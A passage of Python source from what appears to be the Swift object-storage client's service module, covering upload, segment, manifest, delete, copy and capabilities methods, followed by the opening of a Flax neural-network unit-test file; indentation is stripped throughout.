"""
res = {
'action': 'create_container',
'container': container,
'headers': headers
}
create_response = {}
try:
if policy_source is not None:
_meta = conn.head_container(policy_source)
if 'x-storage-policy' in _meta:
policy_header = {
POLICY: _meta.get('x-storage-policy')
}
if headers is None:
headers = policy_header
else:
headers.update(policy_header)
conn.put_container(
container, headers, response_dict=create_response
)
res.update({
'success': True,
'response_dict': create_response
})
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': create_response
})
return res
@staticmethod
def _create_dir_marker_job(conn, container, obj, options, path=None):
res = {
'action': 'create_dir_marker',
'container': container,
'object': obj,
'path': path
}
results_dict = {}
if obj.startswith('./') or obj.startswith('.\\'):
obj = obj[2:]
if obj.startswith('/'):
obj = obj[1:]
if path is not None:
put_headers = {'x-object-meta-mtime': "%f" % getmtime(path)}
else:
put_headers = {'x-object-meta-mtime': "%f" % round(time())}
res['headers'] = put_headers
if options['changed']:
try:
headers = conn.head_object(container, obj)
ct = headers.get('content-type', '').split(';', 1)[0]
cl = int(headers.get('content-length'))
et = headers.get('etag')
mt = headers.get('x-object-meta-mtime')
if (ct in KNOWN_DIR_MARKERS and
cl == 0 and
et == EMPTY_ETAG and
mt == put_headers['x-object-meta-mtime']):
res['success'] = True
return res
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
try:
conn.put_object(container, obj, '', content_length=0,
content_type=KNOWN_DIR_MARKERS[0],
headers=put_headers,
response_dict=results_dict)
res.update({
'success': True,
'response_dict': results_dict})
return res
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': results_dict})
return res
@staticmethod
def _upload_segment_job(conn, path, container, segment_name, segment_start,
segment_size, segment_index, obj_name, options,
results_queue=None):
results_dict = {}
if options['segment_container']:
segment_container = options['segment_container']
else:
segment_container = container + '_segments'
res = {
'action': 'upload_segment',
'for_container': container,
'for_object': obj_name,
'segment_index': segment_index,
'segment_size': segment_size,
'segment_location': '/%s/%s' % (segment_container,
segment_name),
'log_line': '%s segment %s' % (obj_name, segment_index),
}
fp = None
try:
fp = open(path, 'rb', DISK_BUFFER)
fp.seek(segment_start)
contents = LengthWrapper(fp, segment_size, md5=options['checksum'])
etag = conn.put_object(
segment_container,
segment_name,
contents,
content_length=segment_size,
content_type='application/swiftclient-segment',
response_dict=results_dict)
if options['checksum'] and etag and etag != contents.get_md5sum():
raise SwiftError('Segment {0}: upload verification failed: '
'md5 mismatch, local {1} != remote {2} '
'(remote segment has not been removed)'
.format(segment_index,
contents.get_md5sum(),
etag))
res.update({
'success': True,
'response_dict': results_dict,
'segment_etag': etag,
'attempts': conn.attempts
})
if results_queue is not None:
results_queue.put(res)
return res
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': results_dict,
'attempts': conn.attempts
})
if results_queue is not None:
results_queue.put(res)
return res
finally:
if fp is not None:
fp.close()
@staticmethod
def _put_object(conn, container, name, content, headers=None, md5=None):
"""
Upload object into a given container and verify the resulting ETag, if
the md5 optional parameter is passed.
:param conn: The Swift connection to use for uploads.
:param container: The container to put the object into.
:param name: The name of the object.
:param content: Object content.
:param headers: Headers (optional) to associate with the object.
:param md5: MD5 sum of the content. If passed in, will be used to
verify the returned ETag.
:returns: A dictionary as the response from calling put_object.
The keys are:
- status
- reason
- headers
On error, the dictionary contains the following keys:
- success (with value False)
- error - the encountered exception (object)
- error_timestamp
- response_dict - results from the put_object call, as
documented above
- attempts - number of attempts made
"""
if headers is None:
headers = {}
else:
headers = dict(headers)
if md5 is not None:
headers['etag'] = md5
results = {}
try:
etag = conn.put_object(
container, name, content, content_length=len(content),
headers=headers, response_dict=results)
if md5 is not None and etag != md5:
raise SwiftError('Upload verification failed for {0}: md5 '
'mismatch {1} != {2}'.format(name, md5, etag))
results['success'] = True
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
return {
'success': False,
'error': err,
'error_timestamp': err_time,
'response_dict': results,
'attempts': conn.attempts,
'traceback': traceback
}
return results
@staticmethod
def _upload_stream_segment(conn, container, object_name,
segment_container, segment_name,
segment_size, segment_index,
headers, fd):
"""
Upload a segment from a stream, buffering it in memory first. The
resulting object is placed either as a segment in the segment
container, or if it is smaller than a single segment, as the given
object name.
:param conn: Swift Connection to use.
:param container: Container in which the object would be placed.
:param object_name: Name of the final object (used in case the stream
is smaller than the segment_size)
:param segment_container: Container to hold the object segments.
:param segment_name: The name of the segment.
:param segment_size: Minimum segment size.
:param segment_index: The segment index.
:param headers: Headers to attach to the segment/object.
:param fd: File-like handle for the content. Must implement read().
:returns: Dictionary, containing the following keys:
- complete -- whether the stream is exhausted
- segment_size - the actual size of the segment (may be
smaller than the passed in segment_size)
- segment_location - path to the segment
- segment_index - index of the segment
- segment_etag - the ETag for the segment
"""
buf = []
dgst = md5()
bytes_read = 0
while bytes_read < segment_size:
data = fd.read(segment_size - bytes_read)
if not data:
break
bytes_read += len(data)
dgst.update(data)
buf.append(data)
buf = b''.join(buf)
segment_hash = dgst.hexdigest()
if not buf and segment_index > 0:
# Happens if the segment size aligns with the object size
return {'complete': True,
'segment_size': 0,
'segment_index': None,
'segment_etag': None,
'segment_location': None,
'success': True}
if segment_index == 0 and len(buf) < segment_size:
ret = SwiftService._put_object(
conn, container, object_name, buf, headers, segment_hash)
ret['segment_location'] = '/%s/%s' % (container, object_name)
else:
ret = SwiftService._put_object(
conn, segment_container, segment_name, buf, headers,
segment_hash)
ret['segment_location'] = '/%s/%s' % (
segment_container, segment_name)
ret.update(
dict(complete=len(buf) < segment_size,
segment_size=len(buf),
segment_index=segment_index,
segment_etag=segment_hash,
for_object=object_name))
return ret
def _get_chunk_data(self, conn, container, obj, headers, manifest=None):
chunks = []
if 'x-object-manifest' in headers:
scontainer, sprefix = headers['x-object-manifest'].split('/', 1)
for part in self.list(scontainer, {'prefix': sprefix}):
if part["success"]:
chunks.extend(part["listing"])
else:
raise part["error"]
elif config_true_value(headers.get('x-static-large-object')):
if manifest is None:
headers, manifest = conn.get_object(
container, obj, query_string='multipart-manifest=get')
manifest = parse_api_response(headers, manifest)
for chunk in manifest:
if chunk.get('sub_slo'):
scont, sobj = chunk['name'].lstrip('/').split('/', 1)
chunks.extend(self._get_chunk_data(
conn, scont, sobj, {'x-static-large-object': True}))
else:
chunks.append(chunk)
else:
chunks.append({'hash': headers.get('etag').strip('"'),
'bytes': int(headers.get('content-length'))})
return chunks
def _is_identical(self, chunk_data, path):
if path is None:
return False
try:
fp = open(path, 'rb', DISK_BUFFER)
except IOError:
return False
with fp:
for chunk in chunk_data:
to_read = chunk['bytes']
md5sum = md5()
while to_read:
data = fp.read(min(DISK_BUFFER, to_read))
if not data:
return False
md5sum.update(data)
to_read -= len(data)
if md5sum.hexdigest() != chunk['hash']:
return False
# Each chunk is verified; check that we're at the end of the file
return not fp.read(1)
@staticmethod
def _upload_slo_manifest(conn, segment_results, container, obj, headers):
"""
Upload an SLO manifest, given the results of uploading each segment, to
the specified container.
:param segment_results: List of response_dict structures, as populated
by _upload_segment_job. Specifically, each
entry must container the following keys:
- segment_location
- segment_etag
- segment_size
- segment_index
:param container: The container to put the manifest into.
:param obj: The name of the manifest object to use.
:param headers: Optional set of headers to attach to the manifest.
"""
if headers is None:
headers = {}
segment_results.sort(key=lambda di: di['segment_index'])
for seg in segment_results:
seg_loc = seg['segment_location'].lstrip('/')
if isinstance(seg_loc, text_type):
seg_loc = seg_loc.encode('utf-8')
manifest_data = json.dumps([
{
'path': d['segment_location'],
'etag': d['segment_etag'],
'size_bytes': d['segment_size']
} for d in segment_results
])
response = {}
conn.put_object(
container, obj, manifest_data,
headers=headers,
query_string='multipart-manifest=put',
response_dict=response)
return response
def _upload_object_job(self, conn, container, source, obj, options,
results_queue=None):
if obj.startswith('./') or obj.startswith('.\\'):
obj = obj[2:]
if obj.startswith('/'):
obj = obj[1:]
res = {
'action': 'upload_object',
'container': container,
'object': obj
}
if hasattr(source, 'read'):
stream = source
path = None
else:
path = source
res['path'] = path
try:
if path is not None:
put_headers = {'x-object-meta-mtime': "%f" % getmtime(path)}
else:
put_headers = {'x-object-meta-mtime': "%f" % round(time())}
res['headers'] = put_headers
# We need to HEAD all objects now in case we're overwriting a
# manifest object and need to delete the old segments
# ourselves.
old_manifest = None
old_slo_manifest_paths = []
new_slo_manifest_paths = set()
segment_size = int(0 if options['segment_size'] is None
else options['segment_size'])
if (options['changed'] or options['skip_identical'] or
not options['leave_segments']):
try:
headers = conn.head_object(container, obj)
is_slo = config_true_value(
headers.get('x-static-large-object'))
if options['skip_identical'] or (
is_slo and not options['leave_segments']):
chunk_data = self._get_chunk_data(
conn, container, obj, headers)
if options['skip_identical'] and self._is_identical(
chunk_data, path):
res.update({
'success': True,
'status': 'skipped-identical'
})
return res
cl = int(headers.get('content-length'))
mt = headers.get('x-object-meta-mtime')
if (path is not None and options['changed'] and
cl == getsize(path) and
mt == put_headers['x-object-meta-mtime']):
res.update({
'success': True,
'status': 'skipped-changed'
})
return res
if not options['leave_segments'] and not headers.get(
'content-location'):
old_manifest = headers.get('x-object-manifest')
if is_slo:
old_slo_manifest_paths.extend(
normalize_manifest_path(old_seg['name'])
for old_seg in chunk_data)
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# Merge the command line header options to the put_headers
put_headers.update(split_headers(
options['meta'], 'X-Object-Meta-'))
put_headers.update(split_headers(options['header'], ''))
# Don't do segment job if object is not big enough, and never do
# a segment job if we're reading from a stream - we may fail if we
# go over the single object limit, but this gives us a nice way
# to create objects from memory
if (path is not None and segment_size and
(getsize(path) > segment_size)):
res['large_object'] = True
seg_container = container + '_segments'
if options['segment_container']:
seg_container = options['segment_container']
full_size = getsize(path)
segment_futures = []
segment_pool = self.thread_manager.segment_pool
segment = 0
segment_start = 0
while segment_start < full_size:
if segment_start + segment_size > full_size:
segment_size = full_size - segment_start
if options['use_slo']:
segment_name = '%s/slo/%s/%s/%s/%08d' % (
obj, put_headers['x-object-meta-mtime'],
full_size, options['segment_size'], segment
)
else:
segment_name = '%s/%s/%s/%s/%08d' % (
obj, put_headers['x-object-meta-mtime'],
full_size, options['segment_size'], segment
)
seg = segment_pool.submit(
self._upload_segment_job, path, container,
segment_name, segment_start, segment_size, segment,
obj, options, results_queue=results_queue
)
segment_futures.append(seg)
segment += 1
segment_start += segment_size
segment_results = []
errors = False
exceptions = []
for f in interruptable_as_completed(segment_futures):
try:
r = f.result()
if not r['success']:
errors = True
segment_results.append(r)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
errors = True
exceptions.append((err, traceback, err_time))
if errors:
err = ClientException(
'Aborting manifest creation '
'because not all segments could be uploaded. %s/%s'
% (container, obj))
res.update({
'success': False,
'error': err,
'exceptions': exceptions,
'segment_results': segment_results
})
return res
res['segment_results'] = segment_results
if options['use_slo']:
response = self._upload_slo_manifest(
conn, segment_results, container, obj, put_headers)
res['manifest_response_dict'] = response
new_slo_manifest_paths.update(
normalize_manifest_path(new_seg['segment_location'])
for new_seg in segment_results)
else:
new_object_manifest = '%s/%s/%s/%s/%s/' % (
quote(seg_container.encode('utf8')),
quote(obj.encode('utf8')),
put_headers['x-object-meta-mtime'], full_size,
options['segment_size'])
if old_manifest and old_manifest.rstrip('/') == \
new_object_manifest.rstrip('/'):
old_manifest = None
put_headers['x-object-manifest'] = new_object_manifest
mr = {}
conn.put_object(
container, obj, '', content_length=0,
headers=put_headers,
response_dict=mr
)
res['manifest_response_dict'] = mr
elif options['use_slo'] and segment_size and not path:
segment = 0
results = []
while True:
segment_name = '%s/slo/%s/%s/%08d' % (
obj, put_headers['x-object-meta-mtime'],
segment_size, segment
)
seg_container = container + '_segments'
if options['segment_container']:
seg_container = options['segment_container']
ret = self._upload_stream_segment(
conn, container, obj,
seg_container,
segment_name,
segment_size,
segment,
put_headers,
stream
)
if not ret['success']:
return ret
if (ret['complete'] and segment == 0) or\
ret['segment_size'] > 0:
results.append(ret)
if results_queue is not None:
# Don't insert the 0-sized segments or objects
# themselves
if ret['segment_location'] != '/%s/%s' % (
container, obj) and ret['segment_size'] > 0:
results_queue.put(ret)
if ret['complete']:
break
segment += 1
if results[0]['segment_location'] != '/%s/%s' % (
container, obj):
response = self._upload_slo_manifest(
conn, results, container, obj, put_headers)
res['manifest_response_dict'] = response
new_slo_manifest_paths.update(
normalize_manifest_path(new_seg['segment_location'])
for new_seg in results)
res['large_object'] = True
else:
res['response_dict'] = ret
res['large_object'] = False
else:
res['large_object'] = False
obr = {}
fp = None
try:
if path is not None:
content_length = getsize(path)
fp = open(path, 'rb', DISK_BUFFER)
contents = LengthWrapper(fp,
content_length,
md5=options['checksum'])
else:
content_length = None
contents = ReadableToIterable(stream,
md5=options['checksum'])
etag = conn.put_object(
container, obj, contents,
content_length=content_length, headers=put_headers,
response_dict=obr
)
res['response_dict'] = obr
if (options['checksum'] and
etag and etag != contents.get_md5sum()):
raise SwiftError(
'Object upload verification failed: '
'md5 mismatch, local {0} != remote {1} '
'(remote object has not been removed)'
.format(contents.get_md5sum(), etag))
finally:
if fp is not None:
fp.close()
if old_manifest or old_slo_manifest_paths:
drs = []
delobjsmap = defaultdict(list)
if old_manifest:
scontainer, sprefix = old_manifest.split('/', 1)
sprefix = sprefix.rstrip('/') + '/'
for part in self.list(scontainer, {'prefix': sprefix}):
if not part["success"]:
raise part["error"]
delobjsmap[scontainer].extend(
seg['name'] for seg in part['listing'])
if old_slo_manifest_paths:
for seg_to_delete in old_slo_manifest_paths:
if seg_to_delete in new_slo_manifest_paths:
continue
scont, sobj = \
seg_to_delete.split('/', 1)
delobjsmap[scont].append(sobj)
del_segs = []
for dscont, dsobjs in delobjsmap.items():
for dsobj in dsobjs:
del_seg = self.thread_manager.segment_pool.submit(
self._delete_segment, dscont, dsobj,
results_queue=results_queue
)
del_segs.append(del_seg)
for del_seg in interruptable_as_completed(del_segs):
drs.append(del_seg.result())
res['segment_delete_results'] = drs
# return dict for printing
res.update({
'success': True,
'status': 'uploaded',
'attempts': conn.attempts})
return res
except OSError as err:
traceback, err_time = report_traceback()
logger.exception(err)
if err.errno == ENOENT:
error = SwiftError('Local file %r not found' % path, exc=err)
else:
error = err
res.update({
'success': False,
'error': error,
'traceback': traceback,
'error_timestamp': err_time
})
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# Delete related methods
#
def delete(self, container=None, objects=None, options=None):
"""
Delete operations on an account, optional container and optional list
of objects.
:param container: The container to delete or delete from.
:param objects: A list of object names (strings) or SwiftDeleteObject
instances containing an object name, and an
options dict (can be None) to override the options for
that individual delete operation::
[
'object_name',
SwiftDeleteObject('object_name',
options={...}),
...
]
The options dict is described below.
:param options: A dictionary containing options to override the global
options specified during the service object creation::
{
'yes_all': False,
'leave_segments': False,
'version_id': None,
'prefix': None,
'versions': False,
'header': [],
}
:returns: A generator for returning the results of the delete
operations. Each result yielded from the generator is either
a 'delete_container', 'delete_object', 'delete_segment', or
'bulk_delete' dictionary containing the results of an
individual delete operation.
:raises ClientException:
:raises SwiftError:
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
if container is not None:
if objects is not None:
delete_objects = self._make_delete_objects(objects)
if options['prefix']:
delete_objects = [
obj for obj in delete_objects
if obj.object_name.startswith(options['prefix'])]
rq = Queue()
obj_dels = {}
bulk_page_size = self._bulk_delete_page_size(delete_objects)
if bulk_page_size > 1:
page_at_a_time = n_at_a_time(delete_objects,
bulk_page_size)
for page_slice in page_at_a_time:
for obj_slice in n_groups(
page_slice,
self._options['object_dd_threads']):
object_names = [
obj.object_name for obj in obj_slice]
self._bulk_delete(container, object_names, options,
obj_dels)
else:
self._per_item_delete(container, delete_objects, options,
obj_dels, rq)
# Start a thread to watch for delete results
Thread(
target=self._watch_futures, args=(obj_dels, rq)
).start()
# yield results as they become available, raising the first
# encountered exception
res = get_from_queue(rq)
while res is not None:
yield res
# Cancel the remaining jobs if necessary
if options['fail_fast'] and not res['success']:
for d in obj_dels.keys():
d.cancel()
res = get_from_queue(rq)
else:
for res in self._delete_container(container, options):
yield res
else:
if objects:
raise SwiftError('Objects specified without container')
if options['prefix']:
raise SwiftError('Prefix specified without container')
if options['yes_all']:
cancelled = False
containers = []
for part in self.list():
if part["success"]:
containers.extend(c['name'] for c in part['listing'])
else:
raise part["error"]
for con in containers:
if cancelled:
break
else:
for res in self._delete_container(
con, options=options):
yield res
# Cancel the remaining container deletes, but yield
# any pending results
if (not cancelled and options['fail_fast'] and
not res['success']):
cancelled = True
def _bulk_delete_page_size(self, objects):
'''
Given the iterable 'objects', will return how many items should be
deleted at a time.
:param objects: An iterable that supports 'len()'
:returns: The bulk delete page size (i.e. the max number of
objects that can be bulk deleted at once, as reported by
the cluster). If bulk delete is disabled, return 1
'''
if len(objects) <= 2 * self._options['object_dd_threads']:
# Not many objects; may as well delete one-by-one
return 1
if any(obj.options for obj in objects
if isinstance(obj, SwiftDeleteObject)):
# we can't do per option deletes for bulk
return 1
try:
cap_result = self.capabilities()
if not cap_result['success']:
# This shouldn't actually happen, but just in case we start
# being more nuanced about our capabilities result...
return 1
except ClientException:
# Old swift, presumably; assume no bulk middleware
return 1
swift_info = cap_result['capabilities']
if 'bulk_delete' in swift_info:
return swift_info['bulk_delete'].get(
'max_deletes_per_request', 10000)
else:
return 1
def _per_item_delete(self, container, objects, options, rdict, rq):
for delete_obj in objects:
obj = delete_obj.object_name
obj_options = dict(options, **delete_obj.options or {})
obj_del = self.thread_manager.object_dd_pool.submit(
self._delete_object, container, obj, obj_options,
results_queue=rq
)
obj_details = {'container': container, 'object': obj}
rdict[obj_del] = obj_details
@staticmethod
def _delete_segment(conn, container, obj, results_queue=None):
results_dict = {}
try:
res = {'success': True}
conn.delete_object(container, obj, response_dict=results_dict)
except Exception as err:
if not isinstance(err, ClientException) or err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res = {
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
}
res.update({
'action': 'delete_segment',
'container': container,
'object': obj,
'attempts': conn.attempts,
'response_dict': results_dict
})
if results_queue is not None:
results_queue.put(res)
return res
@staticmethod
def _make_delete_objects(objects):
delete_objects = []
for o in objects:
if isinstance(o, string_types):
obj = SwiftDeleteObject(o)
delete_objects.append(obj)
elif isinstance(o, SwiftDeleteObject):
delete_objects.append(o)
else:
raise SwiftError(
"The delete operation takes only strings or "
"SwiftDeleteObjects as input",
obj=o)
return delete_objects
def _delete_object(self, conn, container, obj, options,
results_queue=None):
_headers = {}
_headers = split_headers(options.get('header', []))
res = {
'action': 'delete_object',
'container': container,
'object': obj
}
try:
old_manifest = None
query_params = {}
if not options['leave_segments']:
try:
headers = conn.head_object(container, obj,
headers=_headers,
query_string='symlink=get')
old_manifest = headers.get('x-object-manifest')
if config_true_value(headers.get('x-static-large-object')):
query_params['multipart-manifest'] = 'delete'
except ClientException as err:
if err.http_status != 404:
raise
if options.get('version_id') is not None:
query_params['version-id'] = options['version_id']
query_string = '&'.join('%s=%s' % (k, v) for (k, v)
in sorted(query_params.items()))
results_dict = {}
conn.delete_object(container, obj,
headers=_headers,
query_string=query_string,
response_dict=results_dict)
if old_manifest:
dlo_segments_deleted = True
segment_pool = self.thread_manager.segment_pool
s_container, s_prefix = old_manifest.split('/', 1)
s_prefix = s_prefix.rstrip('/') + '/'
del_segs = []
for part in self.list(
container=s_container, options={'prefix': s_prefix}):
if part["success"]:
seg_list = [o["name"] for o in part["listing"]]
else:
raise part["error"]
for seg in seg_list:
del_seg = segment_pool.submit(
self._delete_segment, s_container,
seg, results_queue=results_queue
)
del_segs.append(del_seg)
for del_seg in interruptable_as_completed(del_segs):
del_res = del_seg.result()
if not del_res["success"]:
dlo_segments_deleted = False
res['dlo_segments_deleted'] = dlo_segments_deleted
res.update({
'success': True,
'response_dict': results_dict,
'attempts': conn.attempts,
})
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
return res
@staticmethod
def _delete_empty_container(conn, container, options):
results_dict = {}
_headers = {}
_headers = split_headers(options.get('header', []))
try:
conn.delete_container(container, headers=_headers,
response_dict=results_dict)
res = {'success': True}
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res = {
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
}
res.update({
'action': 'delete_container',
'container': container,
'object': None,
'attempts': conn.attempts,
'response_dict': results_dict
})
return res
def _delete_container(self, container, options):
try:
for part in self.list(container=container, options=options):
if not part["success"]:
raise part["error"]
delete_objects = []
for item in part['listing']:
delete_opts = {}
if options.get('versions', False) and 'version_id' in item:
delete_opts['version_id'] = item['version_id']
delete_obj = SwiftDeleteObject(item['name'], delete_opts)
delete_objects.append(delete_obj)
for res in self.delete(
container=container,
objects=delete_objects,
options=options):
yield res
if options['prefix']:
# We're only deleting a subset of objects within the container
return
con_del = self.thread_manager.container_pool.submit(
self._delete_empty_container, container, options
)
con_del_res = get_future_result(con_del)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
con_del_res = {
'action': 'delete_container',
'container': container,
'object': None,
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
}
yield con_del_res
# Bulk methods
#
def _bulk_delete(self, container, objects, options, rdict):
if objects:
bulk_del = self.thread_manager.object_dd_pool.submit(
self._bulkdelete, container, objects, options
)
bulk_details = {'container': container, 'objects': objects}
rdict[bulk_del] = bulk_details
@staticmethod
def _bulkdelete(conn, container, objects, options):
results_dict = {}
try:
headers = {
'Accept': 'application/json',
'Content-Type': 'text/plain',
}
res = {'container': container, 'objects': objects}
objects = [quote(('/%s/%s' % (container, obj)).encode('utf-8'))
for obj in objects]
headers, body = conn.post_account(
headers=headers,
query_string='bulk-delete',
data=b''.join(obj.encode('utf-8') + b'\n' for obj in objects),
response_dict=results_dict)
if body:
res.update({'success': True,
'result': parse_api_response(headers, body)})
else:
res.update({
'success': False,
'error': SwiftError(
'No content received on account POST. '
'Is the bulk operations middleware enabled?')})
except Exception as e:
traceback, err_time = report_traceback()
logger.exception(e)
res.update({'success': False, 'error': e, 'traceback': traceback})
res.update({
'action': 'bulk_delete',
'attempts': conn.attempts,
'response_dict': results_dict
})
return res
# Copy related methods
#
def copy(self, container, objects, options=None):
"""
Copy operations on a list of objects in a container. Destination
containers will be created.
:param container: The container from which to copy the objects.
:param objects: A list of object names (strings) or SwiftCopyObject
instances containing an object name and an
options dict (can be None) to override the options for
that individual copy operation::
[
'object_name',
SwiftCopyObject(
'object_name',
options={
'destination': '/container/object',
'fresh_metadata': False,
...
}),
...
]
The options dict is described below.
:param options: A dictionary containing options to override the global
options specified during the service object creation.
These options are applied to all copy operations
performed by this call, unless overridden on a per
object basis.
The options "destination" and "fresh_metadata" do
not need to be set, in this case objects will be
copied onto themselves and metadata will not be
refreshed.
The option "destination" can also be specified in the
format '/container', in which case objects without an
explicit destination will be copied to the destination
/container/original_object_name. Combinations of
multiple objects and a destination in the format
'/container/object' is invalid. Possible options are
given below::
{
'meta': [],
'header': [],
'destination': '/container/object',
'fresh_metadata': False,
}
:returns: A generator returning the results of copying the given list
of objects.
:raises SwiftError:
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
# Try to create the container, just in case it doesn't exist. If this
# fails, it might just be because the user doesn't have container PUT
# permissions, so we'll ignore any error. If there's really a problem,
# it'll surface on the first object COPY.
containers = set(
next(p for p in obj.destination.split("/") if p)
for obj in objects
if isinstance(obj, SwiftCopyObject) and obj.destination
)
if options.get('destination'):
destination_split = options['destination'].split('/')
if destination_split[0]:
raise SwiftError("destination must be in format /cont[/obj]")
_str_objs = [
o for o in objects if not isinstance(o, SwiftCopyObject)
]
if len(destination_split) > 2 and len(_str_objs) > 1:
# TODO (clayg): could be useful to copy multiple objects into
# a destination like "/container/common/prefix/for/objects/"
# where the trailing "/" indicates the destination option is a
# prefix!
raise SwiftError("Combination of multiple objects and "
"destination including object is invalid")
if destination_split[-1] == '':
# N.B. this protects the above case
raise SwiftError("destination can not end in a slash")
containers.add(destination_split[1])
policy_header = {}
_header = split_headers(options["header"])
if POLICY in _header:
policy_header[POLICY] = _header[POLICY]
create_containers = [
self.thread_manager.container_pool.submit(
self._create_container_job, cont, headers=policy_header)
for cont in containers
]
# wait for container creation jobs to complete before any COPY
for r in interruptable_as_completed(create_containers):
res = r.result()
yield res
copy_futures = []
copy_objects = self._make_copy_objects(objects, options)
for copy_object in copy_objects:
obj = copy_object.object_name
obj_options = copy_object.options
destination = copy_object.destination
fresh_metadata = copy_object.fresh_metadata
headers = split_headers(
options['meta'], 'X-Object-Meta-')
# add header options to the headers object for the request.
headers.update(
split_headers(options['header'], ''))
if obj_options is not None:
if 'meta' in obj_options:
headers.update(
split_headers(
obj_options['meta'], 'X-Object-Meta-'
)
)
if 'header' in obj_options:
headers.update(
split_headers(obj_options['header'], '')
)
copy = self.thread_manager.object_uu_pool.submit(
self._copy_object_job, container, obj, destination,
headers, fresh_metadata
)
copy_futures.append(copy)
for r in interruptable_as_completed(copy_futures):
res = r.result()
yield res
@staticmethod
def _make_copy_objects(objects, options):
copy_objects = []
for o in objects:
if isinstance(o, string_types):
obj = SwiftCopyObject(o, options)
copy_objects.append(obj)
elif isinstance(o, SwiftCopyObject):
copy_objects.append(o)
else:
raise SwiftError(
"The copy operation takes only strings or "
"SwiftCopyObjects as input",
obj=o)
return copy_objects
@staticmethod
def _copy_object_job(conn, container, obj, destination, headers,
fresh_metadata):
response_dict = {}
res = {
'success': True,
'action': 'copy_object',
'container': container,
'object': obj,
'destination': destination,
'headers': headers,
'fresh_metadata': fresh_metadata,
'response_dict': response_dict
}
try:
conn.copy_object(
container, obj, destination=destination, headers=headers,
fresh_metadata=fresh_metadata, response_dict=response_dict)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# Capabilities related methods
#
def capabilities(self, url=None, refresh_cache=False):
"""
List the cluster capabilities.
:param url: Proxy URL of the cluster to retrieve capabilities.
:returns: A dictionary containing the capabilities of the cluster.
:raises ClientException:
"""
if not refresh_cache and url in self.capabilities_cache:
return self.capabilities_cache[url]
res = {
'action': 'capabilities',
'timestamp': time(),
}
cap = self.thread_manager.container_pool.submit(
self._get_capabilities, url
)
capabilities = get_future_result(cap)
res.update({
'success': True,
'capabilities': capabilities
})
if url is not None:
res.update({
'url': url
})
self.capabilities_cache[url] = res
return res
@staticmethod
def _get_capabilities(conn, url):
return conn.get_capabilities(url)
# Helper methods
#
@staticmethod
def _watch_futures(futures, result_queue):
"""
Watches a dict of futures and pushes their results onto the given
queue. We use this to wait for a set of futures which may create
futures of their own to wait for, whilst also allowing us to
immediately return the results of those sub-jobs.
When all futures have completed, None is pushed to the queue
If the future is cancelled, we use the dict to return details about
the cancellation.
"""
futures_only = list(futures.keys())
for f in interruptable_as_completed(futures_only):
try:
r = f.result()
if r is not None:
result_queue.put(r)
except CancelledError:
details = futures[f]
res = details
res['status'] = 'cancelled'
result_queue.put(res)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
details = futures[f]
res = details
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
result_queue.put(res)
result_queue.put(None)
|
nn_test.py
|
# Copyright 2020 The Flax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for flax.nn."""
import threading
from absl.testing import absltest
from flax import nn
import jax
from jax import random
from jax.nn import initializers
import jax.numpy as jnp
import numpy as onp
# Parse absl flags test_srcdir and test_tmpdir.
jax.config.parse_flags_with_absl()
class DummyModule(nn.Module):
def apply(self, x):
bias = self.param('bias', x.shape, initializers.ones)
return x + bias
class NestedModule(nn.Module):
def apply(self, x):
x = DummyModule(x, name='dummy_0')
x = DummyModule(x, name='dummy_1')
return x
class NestedModel(nn.Module):
def apply(self, x, model):
x = DummyModule(x, name='dummy_0')
x = model(x, name='inner_model')
return x
class DataDependentInitModule(nn.Module):
def apply(self, x):
bias = self.param('bias', x.shape, lambda rng, shape: x + 1.)
return x + bias
class CollectionModule(nn.Module):
def apply(self, x, activations=None):
bias = self.param('bias', x.shape, initializers.ones)
y = x + bias
if activations:
previous_activation = activations.retrieve()
activations.store(y)
return y, previous_activation
else:
return y, None
class LoopModule(nn.Module):
def apply(self, x, activations=None):
module = CollectionModule.shared(activations=activations, name='dummy')
for _ in range(2):
x, _ = module(x)
return x
class ModuleTest(absltest.TestCase):
def test_init_module(self):
rng = random.PRNGKey(0)
x = jnp.array([1.])
y, params = DummyModule.init(rng, x)
y2 = DummyModule.call(params, x)
self.assertEqual(y, y2)
self.assertEqual(y, jnp.array([2.]))
self.assertEqual(params, {'bias': jnp.array([1.])})
def test_init_by_shape_module(self):
rng = random.PRNGKey(0)
x = jnp.array([1.])
